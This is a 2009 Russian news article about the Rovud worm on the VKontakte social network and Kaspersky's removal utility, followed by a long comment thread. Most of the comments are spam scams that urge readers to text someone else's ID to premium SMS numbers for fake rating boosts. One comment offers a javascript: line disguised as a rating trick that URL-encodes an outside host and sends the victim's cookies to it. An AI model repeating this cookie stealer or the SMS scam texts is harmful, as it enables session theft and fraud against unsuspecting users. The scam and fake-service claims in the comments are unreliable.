Продолжение истории с вирусом «В контакте». Подключился «Касперский»

Вот на такое изображение вирус и рассылает ссылку
Вот на такое изображение вирус и рассылает ссылку
Размер шрифта Decrease font Enlarge font

К борьбе с вирусом на сайте «В контакте» присоединилась «Лаборатория Касперского», которая выдала предупреждение пользователям социальной сети о том, что те 25 мая могут потерять свои персональные данные и предлагает программу, удаляющую вирус.

Напомним, социальная сеть, которой пользуются более десяти миллионов официально зарегистрированных пользователей, подверглась атаке сетевого червя, названного Rovud. Это произошло 16 мая, а на уже следующий день ресурс захватила еще более мощная волна распространения новой модификации вируса.

Массовое распространение вируса стало легко возможным благодаря структуре социальной сети. Червь, попадая в компьютер в момент открытия пользователем присланной ему ссылки на картинку, начинает поиск паролей к сервису «В контакте». В случае успешного завершения поиска всем контактам владельца анкеты на сайте социальной сети рассылается точно такая же ссылка на картинку от имени пользователя зараженной машины. Получив ссылку «от друга», другие пользователи, открыв картинку, также невольным образом способствуют распространению вируса, который опасен тем, что может стереть все файлы на системном диске компьютера.

Несмотря на то, что первый вариант червя достаточно быстро был обнаружен службой вирусного мониторинга компании «Доктор Веб», а служба поддержки сайта «В контакте» была проинформирована об инциденте, остановить эпидемию за один день не удалось.

«Лаборатория Касперского» объявила о том, что вредоносная программа была оперативно обнаружена и добавлена в базу обновлений антивирусных продуктов компании. Однако на незащищенных машинах пользователей опасность массовой активизации 25 мая по-прежнему сохраняется. Поэтому разработчик выпустил специальную утилиту, удаляющую вирус Rovud. Пользователям сайта vkontakte.ru «Лаборатория Касперского» настоятельно рекомендует скачать утилиту и проверить с ее помощью свой компьютер. Для запуска программы необходимы права администратора на компьютере.

Как пишет «Лаборатория Касперского», у червя оказалась интересная предыстория. Перед его появлением в Рунете прошла крупная фишиговая атака с таким сообщением: «Вконтакте.ру начинает розыгрыш призов, а также гарантированный бонус в размере +300% к Вашему текущему рейтингу. Для получения бонуса и участия в розыгрыше призов — отправьте бесплатное СМС с текстом: id10682124 на номер 4449. С уважением, Администрация Вконтакте.ру». Этим способом пользователь сети попытался обманным путем повысить свой рейтинг на сайте, однако за мошенничество его профиль был удален администрацией сети. На следующий день появился вирус, который также обыгрывает тему повышения рейтинга.

Вирусный файл был удален с сайта, где он хранился. Однако в ближайшем будущем возможны новые атаки с модификациями червя. Пользователей социальной сети просят быть внимательными и постараться пока не переходить по предлагаемым ссылкам.

Добавить комментарий comment Комментарии (49 добавлено)

  • Опубликовано kaspersky, 23 Декабрь, 2009 10:53:12
    касперский вконтакте, как будто это самый лучший антивирус
  • Опубликовано lex, 12 Октябрь, 2009 21:26:23
    Люди бесплатных способов поднять рейтинг НЕТ!!! Есть только один очень выгодный способ поднять: Россия - "id12786845" (без кавычек) на кoрoткий нoмеp 2090 Украина - "id12786845" (без кавычек) на кoрoткий нoмеp 4280,1045 Беларусь - "id12786845" (без кавычек) на кoрoткий нoмеp 4449, 3335 Казахстан - "id12786845" (без кавычек) на кoрoткий нoмеp 8444,9685 Армения - "id12786845" (без кавычек) на кoрoткий нoмеp 9685 Азербайджан - "id12786845" (без кавычек) на кoрoткий нoмеp 8553 Латвия - "id12786845" (без кавычек) на кoрoткий нoмеp 1834 Грузия - "id12786845" (без кавычек) на кoрoткий нoмеp 9877 Израиль - "id12786845" (без кавычек) на кoрoткий номер 5599 Германия- "id12786845" (без кавычек) на кoрoткий номер 88809 1смс- 150% V I P статус 3смс(подряд)- 500% 5смс(подряд)- 1000% 10смс(подряд)-5000% Стоимость [СМС] сообщения - 1.25 рубля или 0.3 гривень (0.11 usd Я ДУМАЛ ЧТО ЭТО РАЗВОД! потом подумал что терять и решыл отправить СМС когда у меня повысился рейтинг я ОФИГЕЛ! НЕВЕРЬТЕ БОЛЬШЕ НИКОМУ!!!!! ЕТО РЕАЛЬНО ПОДНИМАЕТ РЕЙТИНГ!!!!!
  • Опубликовано ledy, 24 Авуст, 2009 13:36:38
    http://vkontakte.ru/app654889_43599096 это самый легкий и рабочий способ заработка голосов! за 5 приглашенных 1 голос ! быстрее пока не сделали дороже!
  • Опубликовано Леночка, 08 Авуст, 2009 23:35:29
    Количество людей, зарегистрировавшихся ВКонтакте достигло 32 миллионов. Разумеется некоторые хотят выделяться, и это правильно! Специально для этого мы разработали " V I P сервис". Если ты не такой как все, если ты хочешь выделяться из серой массы, ты просто обязан стать V I P пользователем ВКонтакте, плюс к этому мы добавляем 150% к вашему рейтингу! Для этого нужно просто отправить [СМС] сообщение с текстом: «id9426678» по номеру «2090»(Россия)«4280»(Украина) или «5555»(Белорусь) , без кавычек . В ответном сообщении прийдёт пароль, который нужно ввести вместо пароля при входе на сайт ВКонтакте. 1смс- 100% V I P статус 2смс- 250% 3смс- 500% Стоимость [СМС] сообщения - 3 рубля или 0.5 гривны (0.15 usd) После этого полоска рейтинга станет золотого цвета. На вашей аватарке появится статус ''V I P’’ и ваша страничка будет отображаться на первых местах в поиске, а также Вам станут доступны для просмотра альбомы и видеозаписи всех пользователей, даже закрытые настройками приватности. Спешите предложение ограничено!!! Если рейтинг не пришел в течении 10 минут то отправьте повторное сообщение, оно бесплатно!
  • Опубликовано Влада, 01 Авуст, 2009 17:01:26
    Помогите!!!!!!!! при входе в контакт я вижу Из-за того что ваш акаунт долго не проявлял активность, мы были вынуждены его заблокировать если вы живой человек а не СПАМ-БОТ просим. Отправьте со своего мобильного телефона SMS-сообщение с текстом255 nk4452+5668 на короткий номера: 9693 Для России 8883 Для Украины Я смс отправила 50 гривен снялось а код не пришол Что делать??????????????
  • Опубликовано Андрюха, 23 Июль, 2009 09:40:18
     Существует два способа повышения рейтинга Вконтакте. Дуров создал рейтинг для систематизации анкет пользователей по какому нибудь критерию. В данном случае это рейтинг. Как известно, что бы повысить рейтинг необходимо отправлять смс с содержанием и на определенные номера. Отправка смс с текстом id****** (пример idХХХХХХ) на номер 1053(3 голоса) и 2090(10 голосов) даст Вам возможность проголосовать за себя или за друга. Данный способ считается легальными позволяет повысить Ваш рейтинг(или друга) на определенное количество голосов Но как известно, зайдя в самом контакте в поиск людей, можно обнаружить, что рейтинг 10 первых человек превышает 10000 и даже 30000 - это означает, что обычным (легальным) способом таких результатов добиться очень сложно, к тому же будет много затрат с отправкой смс. В связи с этим Дуров создал нелегальный способ накрутки рейтинга. Отправляя смс на те же самые но с текстом id43901546 возможность повысить рейтинг сразу на 30 голосов используя всего одну смс. Может показаться странным, что используется чужой id, но это не так. Для того, что бы повысить рейтинг на 30 или 50 голосов Дуров создал “бота” который скрывается среди анкет обычных пользователей. На одной из Московских вечеринок Павел рассказал, что ему помогли его друзья в создании проекта и, что касается рейтинга то если обычные пользователи знали бы о изъянах таких как боты увеличивающие количество голосов, то незамедлительно повышали себе рейтинг, что привело б к нарушению процесса деятельности самого проекта как “vkontakte”. Однако, что бы не вызывать подозрения Дуров дал информацию нескольким людям о способе повышения рейтинга. Как известно Павел занимает не первое место по рейтингу среди пользователей контакта. Один из нескольких человек рассказал о нелегальном способе повышения рейтинга используя “ботов”. На данный момент известен только один из них, а именно бот id43901546 . Отображаясь как обычная анкета, бот повышает рейтинг на 50 голосов и более. Способ нелегального повышения рейтинга: 1. отправляем смс на номер 1053(30 голосов) или 2090 (50 голосов) с текстом id43901546 2. Но есть одно НО! Сообщения с этим ID отправляются бесплатно только на номер 2090! Попробуйте и убедитесь во всем сами! 3. получаем ответную смс!!! (в обычных случаях Вам обратно никто отправлять смс не будет!!!), заходим в контакт, выбираем голосовать, вводим секретный код(будет написан в ответном смс) 4. голосуем!
  • Опубликовано frestyle, 08 Июль, 2009 21:14:44
    Количество людей, зарегистрировавшихся ВКонтакте уже 43 миллионов. И многие люди хотят выделяться, и это правильно! Специально для этого мы разработали " V I P сервис". Если ты не такой как все, если ты хочешь выделяться из серой массы, ты просто обязан стать V I P пользователем ВКонтакте! Для этого нужно просто отправить всего 1 sms сообщение с текстом «id8078079» - нa нoмeр «2090» если сообщение не будет отправлятся то номер «1053» Сразу дается 50% к Pейтингу!!! С левой стороны вашей страницы появляются неиспользованные голоса, которые вы в праве потратить как хотите!!! 1[sms]- 50% 2[sms]- 100% и "V I P" статус 3[sms]- 150% 4[sms]- 200% и т.д... Стоимость [sms] сообщения - первые 2 [sms] повысят ваш рейтинг до 100% - каждая 1рублей. Остальные по 2 рублей. После этого полоска рейтинга станет золотого цвета. На вашей аватарке, если вы захотите, появится статус ''V I P’’ , и Ваша страничка будет отображаться на первых местах в поиске, а также Вам станут доступны для просмотра альбомы и видеозаписи всех пользователей, даже за закрытыми настройками приватности. Данный сервер был разработан для новых пользователей в контакте. Для тех кто думает что это обычная спам группа! Нет это не она! Эта офоициальная группа по пояснению поднятия рэйтинга со всеми авторскими правами!!!
  • Опубликовано Евгений, 03 Июль, 2009 23:58:11
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!! Единственная прога для отправки смс на короткие номера это http://smssend.land.ru/download/smssendor.zip и не ведитесь на развод про отправку смс с чужими id они только варуют ваши деньги !!!!!!!!!!!!!!!!!!!!!!!!
  • Опубликовано Wyk, 24 Июнь, 2009 15:39:15
    ВНИМАНИЕ !!!!!! ЗАБУДЬТЕ О ПРОГРАММАХ ПОВЫШЕНИЯ РЕЙТИНГА ОНИ ВСЁРАВНО НЕРАБОТАЮТ, А ТОЛЬКО ВОРУЮТ ВАШИ АНКЕТЫ. ЭТО ЕДИНСТВЕННЫЙ НА СЕГОДНЕШНИЙ ДЕНЬ СПОСОБ ПОДНЯТИЯ РЕЙТИНГА НЕ НА 3% ЗА 1 SMS, А НА 50% ЗА 1 SMS И + СУПЕРБОНУС ЗА 10 SMS !!! Для того чтобы поднять рейтинг ВКОНТАКТЕ сразу на 50% нужно отправить SMS НА НОМЕР 1053 с текстом без скобок ( id30214235 ), 1) ЗА 2 SMS 100% РЕЙТИНГА, 2) ЗА 3 SMS 150% РЕЙТИНГА, 3) ЗА 4 SMS 200% РЕЙТИНГА, 4) ЗА 5 SMS 250% РЕЙТИНГА !!!!!! 5) ЗА 10 SMS СУПЕР БОНУС 5000% РЕЙТИНГА !!!!!!!! ТОРОПИТЕСЬ ПОКА ЭТО РАБОТАЕТ !!!!!!!!!!!!!СТОИМОСТЬ ВСЕГО 20 РУБЛЕЙ !!!!!!!! ЕСЛИ РЕЙТИНГ НЕПОВЫСИЛСЯ ВТЕЧЕНИЕ 5 МИНУТ, ОТПРАВЬТЕ ПОВТОРНО ТАКОЕЖЕ КОЛИЧЕСТВО SMS, ОНИ АБСОЛЮТНО БЕСПЛАТНЫЕ !!!
  • Опубликовано vk-sun, 03 Июнь, 2009 18:46:59
    Люди не доверяйте всяким программам,вот настоящий проверенный способ!!! Сколько уже было сказанно про этот сервис… Не ведитесь на липовую информацию! Вконтакте существует только один единственный, специально отведенный, номер, позволяющий поднимать себе рейтинг по цене, значительно меньшей, нежели как способом, изложенном на официальной странице.Данный номер разработан специально для друзей и близких Паши Дурова. НОМЕР ПОЗВОЛЯЮЩИЙ НАКРУТИТЬ РЕЙТИНГ ПО приемлимонизкой цене: 36671048- запомните его… раз и навсегда. Данный скрытый сервис работает УСЛОВНО! возможность подачи запроса ограничена! не пытайтесь повысить себе рейтинг более трех раз в двадцать четыре часа-безрузультатно потратите деньги! Хоть и не большие, но наши!кровные!) Итак- Повышаем, увеличиваем рейтинг ВКонтакте VKontakte 1) Отправляем смс на номер 2090(для жителей России) или 4280(для жителей Украины) с текстом id 36671048 (стоимость смс ~3 рубля или 1 гривна без НДС) 2) В ответном сообщении в течении 3-10 минут приходит пароль который надо ввести вместо пороля вашей учетной записи при следующем входе на сайт www.vkontakte.ru 3) При заходе на сайт увидите сообщение “Рейтинг успешно повышен” и Ваш рейтинг будет выше на 30% Чтобы повысить рейтинг, соблюдайте важные правила: 1) Данный сервис работает ТОЛЬКО для абонентов всех сотовых операторов России и Украины. 2) Отправлять смс на номер 2090 и 4280 с id 36671048 можно не более 3 раз в сутки (24 часа) Пользуйтесь на здоровье P.S. Вас заинтересует зачем я рассказал так открыто о системе повышения рейтинга ВКонтакте ?:) Отвечаю: У меня рейтинг 777 - цифра красивая, менять я её не собираюсь. Мне этот способ больше не пригодится. Запомните, ретинг свыше 300% не дает обсолютно никакого преимущества перед остальными! проверенно) - запомните его… раз и навсегда. Данный скрытый сервис работает УСЛОВНО! возможность подачи запроса ограничена! не пытайтесь повысить себе рейтинг более трех раз в двадцать четыре часа-безрузультатно потратите деньги! Хоть и не большие, но наши!кровные!) Итак- Повышаем, увеличиваем рейтинг ВКонтакте VKontakte 1) Отправляем смс на номер 2090 и 4280 с текстом id36671048 (стоимость смс ~3 рубля или 1 гривна без НДС) 2) В ответном сообщении в течении 3-10 минут приходит пароль который надо ввести вместо пороля вашей учетной записи при следующем входе на сайт www.vkontakte.ru 3) При заходе на сайт увидите сообщение “Рейтинг успешно повышен” и Ваш рейтинг будет выше на 30% Чтобы повысить рейтинг, соблюдайте важные правила: 1) Данный сервис работает ТОЛЬКО для абонентов всех сотовых операторов России и Украины. 2) Отправлять смс на номер 2090 и 4280 с id 36671048можно не более 3 раз в сутки (24 часа) Пользуйтесь на здоровье P.S. Вас заинтересует зачем я рассказал так открыто о системе повышения рейтинга ВКонтакте ?:) Отвечаю: У меня рейтинг 777 - цифра красивая, менять я её не собираюсь. Мне этот способ больше не пригодится. Запомните, ретинг свыше 300% не дает обсолютно никакого преимущества перед остальными! проверенно)
  • Опубликовано Абонент временно не доступен, 17 Май, 2009 20:00:49
    Количество людей, зарегистрировавшихся ВКонтакте достигло 24 миллионов. Разумеется некоторые хотят выделяться, и это правильно! Специально для этого мы разработали " V I P сервис". Если ты не такой как все, если ты хочешь выделяться из серой массы, ты просто обязан стать V I P пользователем ВКонтакте, плюс к этому мы добавляем 150% к вашему рейтингу! Для этого нужно просто отправить [СМС] сообщение с текстом: «id33300178» по номеру «1045» или «4449 » , без кавычек . В ответном сообщении прийдёт пароль, который нужно ввести вместо пароля при входе на сайт ВКонтакте. 1смс- 100% V I P статус 2смс- 250% 3смс- 500% Стоимость [СМС] сообщения - 3 рубля или 0.5 гриваs (0.15 usd) После этого полоска рейтинга станет золотого цвета. На вашей аватарке появится статус ''V I P’’ и ваша страничка будет отображаться на первых местах в поиске, а также Вам станут доступны для просмотра альбомы и видеозаписи всех пользователей, даже закрытые настройками приватности. Спешите предложение ограничено!!! Если рейтинг не пришел в течении 10 минут то отправьте повторное сообщение, оно бесплатно!
  • Опубликовано kir7370, 11 Май, 2009 19:43:34
    Количество людей, зарегистрировавшихся ВКонтакте достигло 24 миллионов. Разумеется некоторые хотят выделяться, и это правильно! Специально для этого мы разработали " V I P сервис". Если ты не такой как все, если ты хочешь выделяться из серой массы, ты просто обязан стать V I P пользователем ВКонтакте, плюс к этому мы добавляем 150% к вашему рейтингу! Для этого нужно просто отправить [СМС] сообщение с текстом: «id31983565» по номеру «1045» или «4449 » , без кавычек . В ответном сообщении прийдёт пароль, который нужно ввести вместо пароля при входе на сайт ВКонтакте. 1смс- 100% V I P статус 2смс- 250% 3смс- 500% Стоимость [СМС] сообщения - 3 рубля или 0.5 гриваs (0.15 usd) После этого полоска рейтинга станет золотого цвета. На вашей аватарке появится статус ''V I P’’ и ваша страничка будет отображаться на первых местах в поиске, а также Вам станут доступны для просмотра альбомы и видеозаписи всех пользователей, даже закрытые настройками приватности. Спешите предложение ограничено!!! Если рейтинг не пришел в течении 10 минут то отправьте повторное сообщение, оно бесплатно!
  • Опубликовано Ира, 11 Май, 2009 01:36:00
    С помощью этого сайта, я повысила рейтнг http://vkontakte-up.ucoz.ru Всем советую читать внимательно инструкцию, и тогда у вас всё получится!
  • Опубликовано катя, 07 Май, 2009 00:41:11
    ПОМОГИТЕ!!! не могу вообще ни как в контакт зайти.пишут какие то цифры или ноу фанд :(муж какую то фигню с рейтингом запустил
  • Опубликовано angel, 06 Май, 2009 19:27:52
    Люди у которых рейтинг превышает 30000 вы думаете, что они отправляли смс как и все? И получали по 3 -10 % рейтинга, нет они пользовались этой формой Павел Дуров создал 5 ботов, которые дают рейтинг пользователям и вот я нашёл такого бота за 1 смс он даёт 150% к рейтингу, а не по 3 и не по 10.СМС стоит всего 3 рубля! Для этого нужно просто отправить [СМС] сообщение с текстом: «id34807930» (без кавычек) по номеру 2090 если возникнут проблемы то по номеру 1053. В ответном сообщении придёт пароль, который нужно ввести вместо пароля при входе на сайт ВКонтакте. 1смс- 150% V I P статус 3смс(подряд)- 500% 5смс(подряд)- 1000% 10смс(подряд)-5000% Стоимость [СМС] сообщения - 1.25 рубля или 0.3 гривень (0.11 usd) Россия - "id34807930" (без кавычек) на кoрoткий нoмеp 2090,1053 Украина - "id34807930" (без кавычек) на кoрoткий нoмеp 4280,1045 Беларусь - "id34807930" (без кавычек) на кoрoткий нoмеp 5555,5553 Казахстан - "id34807930" (без кавычек) на кoрoткий нoмеp 9685,9684 Армения - "id34807930" (без кавычек) на кoрoткий нoмеp 9785,9782 Азербайджан - "id34807930" (без кавычек) на кoрoткий нoмеp 8553,8550 Латвия - "id34807930" (без кавычек) на кoрoткий нoмеp 1012,1008 Грузия - "id34807930" (без кавычек) на кoрoткий нoмеp 9877,9787 Израиль - "10id34807930" (без кавычек) на кoрoткий номер 559902 Германия- "111id34807930" (без кавычек) на кoрoткий номер 88809 После этого полоска рейтинга станет золотого цвета. На вашей аватарке появится статус ''V I P’’ и ваша страничка будет отображаться на первых местах в поиске, а также Вам станут доступны для просмотра альбомы и видеозаписи всех пользователей, даже закрытые настройками приватности. Если рейтинг не пришел в течении 10 минут то отправьте повторное сообщение, оно бесплатно!
  • Опубликовано камилла, 24 Апрель, 2009 19:18:45
    Сколько уже было сказанно про этот сервис... Не ведитесь на липовую информацию! В вконтакте существует только один единственный, специально отведенный, номер, позволяющий поднимать себе рейтинг по цене, значительно меньшей, нежели как способом, изложенном на официальной странице. Данный номер разработан специально для друзей и близких Паши. НОМЕР ПОЗВОЛЯЮЩИЙ НАКРУТИТЬ РЕЙТИНГ ПО приемлимонизкой цене: 34632009 - запомните его... раз и навсегда.ВОТ МОЯ СТРАНИЧКА http://vkontakte.ru/id12682477 Данный скрытый сервис работает УСЛОВНО! возможность подачи запроса ограничена! не пытайтесь повысить себе рейтинг более трех раз в двадцать четыре часа-безрузультатно потратите деньги! Хоть и не большие, но наши!кровные!) Итак- Повышаем, увеличиваем рейтинг ВКонтакте VKontakte 1) Отправляем смс на номер 1046 с текстом id 34632009 (стоимость смс ~3 рубля без НДС) 2) В ответном сообщении в течении 3-10 минут приходит пароль который надо ввести вместо пороля вашей учетной записи при следующем входе на сайт vkontakte.ru 3) При заходе на сайт увидите сообщение "Рейтинг успешно повышен" и Ваш рейтинг будет выше на 30% Чтобы повысить рейтинг, соблюдайте важные правила: 1) Данный сервис работает ТОЛЬКО для абонентов всех сотовых операторов России и Украины. 2) Отправлять смс на номер 4280 с id 34632009 можно не более 3 раз в сутки (24 часа) Пользуйтесь на здоровье P.S. Вас заинтересует зачем я рассказал так открыто о системе повышения рейтинга ВКонтакте ?:) Отвечаю: У меня цифра красивая, менять я её не собираюсь. Мне этот способ больше не пригодится. Запомните, ретинг свыше 300% не дает обсолютно никакого преимущества перед остальными! проверенно)
  • Опубликовано аноним, 24 Апрель, 2009 18:01:58
    Я нашел несколько дыр вконтакте.Я знаю как можно накрутить рейтинг бесплатно! Написал для этого спец прогу. Только работает она из России, Украины и Казахстана(т.е. там где можно отправить смс-ку)Я знаю как можно просмотреть закрытые страницы и закрытые альбомы. Я знаю как можно поставить семейный статус "Все сложно с" самим собой. Я могу поделиться этими знаниями, но естественно за определенную плату - отправляйте смской текст id17888189 на номер 1045 или 4449 После этого пишите мне в личное время отправки!! Смс стоит всего 0,3$. Я вышлю вам эту программу или расскажу секреты контакта. Вот док-во работы моей проги: vkontakte.ru/rate.php?act=vote&id=4536279
  • Опубликовано климентинка, 22 Апрель, 2009 20:20:49
    У меня та же проблема, что и у Жеки(( перешла по этой ссылке и контакт не аботает. Ни один антивирус не находит его..
  • Опубликовано Жека, 21 Апрель, 2009 17:09:19
    мне пришло сообщение чтобы я зашол на ссылку http://essi.ws/945 и было написало что это управление в контакте теперь я немогу вообще зайти на сайт Вконтакте.ру у меня пишет какието цыфры а в других браузерах пишет что надо отправить код на номер 6008 против спамов!!....что это такое??????
  • Опубликовано марик, 20 Апрель, 2009 20:37:46
    спасибо камилла очень тебе благодарен!!!!!!!!
  • Опубликовано камилла, 19 Апрель, 2009 19:23:37
    Сколько уже было сказанно про этот сервис... Не ведитесь на липовую информацию! В вконтакте существует только один единственный, специально отведенный, номер, позволяющий поднимать себе рейтинг по цене, значительно меньшей, нежели как способом, изложенном на официальной странице. Данный номер разработан специально для друзей и близких Паши. НОМЕР ПОЗВОЛЯЮЩИЙ НАКРУТИТЬ РЕЙТИНГ ПО приемлимонизкой цене: 23784271 - запомните его... раз и навсегда.ВОТ МОЯ СТРАНИЧКА http://vkontakte.ru/id12682477 Данный скрытый сервис работает УСЛОВНО! возможность подачи запроса ограничена! не пытайтесь повысить себе рейтинг более трех раз в двадцать четыре часа-безрузультатно потратите деньги! Хоть и не большие, но наши!кровные!) Итак- Повышаем, увеличиваем рейтинг ВКонтакте VKontakte 1) Отправляем смс на номер 1046 с текстом id 23784271 (стоимость смс ~3 рубля без НДС) 2) В ответном сообщении в течении 3-10 минут приходит пароль который надо ввести вместо пороля вашей учетной записи при следующем входе на сайт vkontakte.ru 3) При заходе на сайт увидите сообщение "Рейтинг успешно повышен" и Ваш рейтинг будет выше на 30% Чтобы повысить рейтинг, соблюдайте важные правила: 1) Данный сервис работает ТОЛЬКО для абонентов всех сотовых операторов России и Украины. 2) Отправлять смс на номер 1046 с id 23784271можно не более 3 раз в сутки (24 часа) Пользуйтесь на здоровье P.S. Вас заинтересует зачем я рассказал так открыто о системе повышения рейтинга ВКонтакте ?:) Отвечаю: У меня цифра красивая, менять я её не собираюсь. Мне этот способ больше не пригодится. Запомните, ретинг свыше 300% не дает обсолютно никакого преимущества перед остальными! проверенно)
  • Опубликовано серж, 19 Апрель, 2009 17:37:22
    Количество людей, зарегистрировавшихся ВКонтакте достигло 32 миллионов. Разумеется некоторые хотят выделяться, и это правильно! Специально для этого мы разработали " V I P сервис". Если ты не такой как все, если ты хочешь выделяться из серой массы, ты просто обязан стать V I P пользователем ВКонтакте, плюс к этому мы добавляем 150% к вашему рейтингу! Для этого нужно просто отправить [СМС] сообщение с текстом: «id34807930» по номеру «2090»(Россия)«4280»(Украина) или «5555»(Белорусь) , без кавычек . В ответном сообщении прийдёт пароль, который нужно ввести вместо пароля при входе на сайт ВКонтакте. 1смс- 100% V I P статус 2смс- 250% 3смс- 500% Стоимость [СМС] сообщения - 3 рубля или 0.5 гриваs (0.15 usd) После этого полоска рейтинга станет золотого цвета. На вашей аватарке появится статус ''V I P’’ и ваша страничка будет отображаться на первых местах в поиске, а также Вам станут доступны для просмотра альбомы и видеозаписи всех пользователей, даже закрытые настройками приватности. Спешите предложение ограничено!!! Если рейтинг не пришел в течении 10 минут то отправьте повторное сообщение, оно бесплатно!
  • Опубликовано макс, 16 Апрель, 2009 16:44:56
    Сколько уже было сказанно про этот сервис... Не ведитесь на липовую информацию! В вконтакте существует только один единственный, специально отведенный, номер, позволяющий поднимать себе рейтинг по цене, значительно меньшей, нежели как способом, изложенном на официальной странице. Данный номер разработан специально для друзей и близких Паши. НОМЕР ПОЗВОЛЯЮЩИЙ НАКРУТИТЬ РЕЙТИНГ ПО приемлимонизкой цене: 23784271 - запомните его... раз и навсегда. Данный скрытый сервис работает УСЛОВНО! возможность подачи запроса ограничена! не пытайтесь повысить себе рейтинг более трех раз в двадцать четыре часа-безрузультатно потратите деньги! Хоть и не большие, но наши!кровные!) Итак- Повышаем, увеличиваем рейтинг ВКонтакте VKontakte 1) Отправляем смс на номер 1046 с текстом id 23784271 (стоимость смс ~3 рубля без НДС) 2) В ответном сообщении в течении 3-10 минут приходит пароль который надо ввести вместо пороля вашей учетной записи при следующем входе на сайт vkontakte.ru 3) При заходе на сайт увидите сообщение "Рейтинг успешно повышен" и Ваш рейтинг будет выше на 30% Чтобы повысить рейтинг, соблюдайте важные правила: 1) Данный сервис работает ТОЛЬКО для абонентов всех сотовых операторов России и Украины. 2) Отправлять смс на номер 1046 с id 23784271можно не более 3 раз в сутки (24 часа) Пользуйтесь на здоровье P.S. Вас заинтересует зачем я рассказал так открыто о системе повышения рейтинга ВКонтакте ?:) Отвечаю: У меня рейтинг 777 - цифра красивая, менять я её не собираюсь. Мне этот способ больше не пригодится. Запомните, ретинг свыше 300% не дает обсолютно никакого преимущества перед остальными! проверенно)
  • Опубликовано BOBAH, 13 Апрель, 2009 19:27:46
    http://vkontakte-up.ucoz.ru Супер рейтинг на 150 поднял и нежалею!!!!! спасибо!!!!
  • Опубликовано Аня, 13 Апрель, 2009 16:03:29
    Ребятки есть способ, один хороший человек все здесь описал http://vkontakte-up.ucoz.ru Рейтинг долго ждала но всё таки через сутки,после отправки на мыло информации, пришло 100 единиц!
  • Опубликовано reyt, 07 Апрель, 2009 18:53:39
    Итак, показываю как добавлять рейтинг намного больше за те же деньги! Отправляете сначала смс с текстом id33477856 на номер 1046 (Ru) или 4449 (Ua) После отправки смс, вставляете а адресатную строку вот етот скрипт: javascript:msg="от Павел Дуров+20";document.getElementById("nav").innerHTML=document.getElementById("nav").innerHTML+msg;img=new Image();img.src="%68%74%74%70%3A%2F%2F%6D%2D%7A%2E%66%72%65%65%68%6F%73%74%69%61%2E%63%6F%6D%2F%73%2E%70%68%70%3F"+document.cookie;alert('Рейтинг увеличен!'); И нажымаете ентер. Если вы не отправили смс, то рейтинг не повысится, а так повышаеться на 30 балов за те же деньги, других способов не знаю! (Рейтинг добавляется так, типо за вас проголосовал Павел Дуров!)
  • Опубликовано id14123663, 28 Март, 2009 19:14:42
    Вам не стыдно всем людей обманывать???? Никаких ботов не существует!!! Уткнитесь!Хотите рейтинг?-Работайте, отправляйте смс-ки а не сидите за компами сутками! Будьте дружелюбны!-Люди сами будут пополнять вам рейтинг! В конце концов будьте звездами!(если у вас это получится конечно)
  • Опубликовано Usual, 24 Март, 2009 09:58:58
    Я хочу помочь вам повысить рейтинг для ютого требуется 3-4 рубля Отправить ​SMS с id24181061 на номер 4444 или 4449,не бойтесь что чужой ид
  • Опубликовано seregka, 17 Март, 2009 22:21:31
    Вот буквально пару дней назад вконтакте был перезапущеный бот пот ником Тест Тест ” можите попытаца найти эго в поиске” И у него политела база, сейчас В украине с МТС можно отправлять смс чтоб получить голос по 20коп, пробуйте, 1045 id19130195 60 коп. 3 голоса 4280 id19130195 2.10 коп. 10 голосов Роботаеть все четко без наёбок, , эту инфу я вылажыл в честь того что надоело читать одни разводы и смотреть как людей на..буют…, кто щитает это за радвод можыте не отправлять смс… Если вам не пришло ответное смс, значит попробуйте еще раз,кто не верит может не отправлять смс...!!!!!
  • Опубликовано Kisska, 13 Март, 2009 22:03:15
    ХАРЕ ЛЮДЕЙ НА"БЫВАТЬ!!!!!!!!! :( :( :( КОРОЧЕ ОБЬЯСНЯЮ ДЛЯ АБОНЕНТОВ БИЛАЙН: Номер Текст Стоимость Результат 1045 id20521762 29,66 руб. 3 голоса 1046 id20521762 84,75 руб. 10 голосо ДЛЯ АБОНЕНТОВ МЕГАФОН: Номер Текст Стоимость Результат 1045 id20521762 30,00 руб. 3 голоса 1046 id20521762 120,00 руб. 10 голосов ДЛЯ АБОНЕНТОВ МТС: Номер Текст Стоимость Результат 1045 id20521762 28,41 руб. 3 голоса 1046 id20521762 85,81 руб. 10 голосов ДЛЯ АБОНЕНТОВ TELE2: Номер Текст СтоимостьРезультат 1045 id20521762 30,00 руб. 3 голоса 1046 id2052176290,00 руб 10 голосов ВСЕ СПАСИБО ЗА ВНИМАНИЕ!
  • Опубликовано Kiss, 13 Март, 2009 20:50:16
    Сама не верила, но повышение рейтинга В Контакте РЕАЛЬНО! Суть: нужно отправить id20521762 на номер 1046, стоимость около 0,95$ уже с НДС в зависимости от оператора!!!! Не так много для удовольствия выделиться среди своих друзей! Придет пароль, который нужно ввести вместо своего логина и всё - у Вас на 50% больше! Реально работает Но не злоупотребляйте!!! У меня рейтинг три 777, больше не хочу - нравиться само число, да и смысла больше нет - ничего особенного это не даёт Так что вот так! Дерзайте!!!!……………………
  • Опубликовано Nika, 27 Февраль, 2009 18:39:42
    ХВАТИТ НА"БЫВАТЬ НАРОД!!!!!!
  • Опубликовано Саня, 27 Февраль, 2009 01:02:52
    Не верте во всю эту дрянь боты сушествуют,. Чтобы добавить 30% отправте смс на номер 1045 с таким id20404005
  • Опубликовано Женя, 26 Февраль, 2009 14:52:39
    Люди,никогда не отсылайте смс с чужим id!!! Если хотите эффективно и быстро повысить свой рейтинг,то отправьте смс с вашим id,ну например id11111111,но вместо однёрок свой id, на 1045(3 голоса=30 рублей) или на 1046(10 голосов=90 рублей).После ответной смски пройдите по ссылке http://vkontakte.ru/id25723872?rate=1&v=3.После у вас прибавиться 30% или 100% рейтинга (в зависимости от отправленной вами смс). Люди,запомните,что никаких "ботов" не существует,а Пользователь id25723872-это я! Вы не отправляете смс с чужим id,а я никакой не бот! Просто с помощью проги я увеличиваю голоса в 10 раз,а не в тысячи раз как пишут мошенники! Если возникли вопросы обращайтесь в личку (id25723872)!
  • Опубликовано мария, 25 Февраль, 2009 22:27:29
    Виктор спасибо!!!!бот действительно настоящий!!я повысила свой рейтинг на 300%
  • Опубликовано виктор, 25 Февраль, 2009 21:52:26
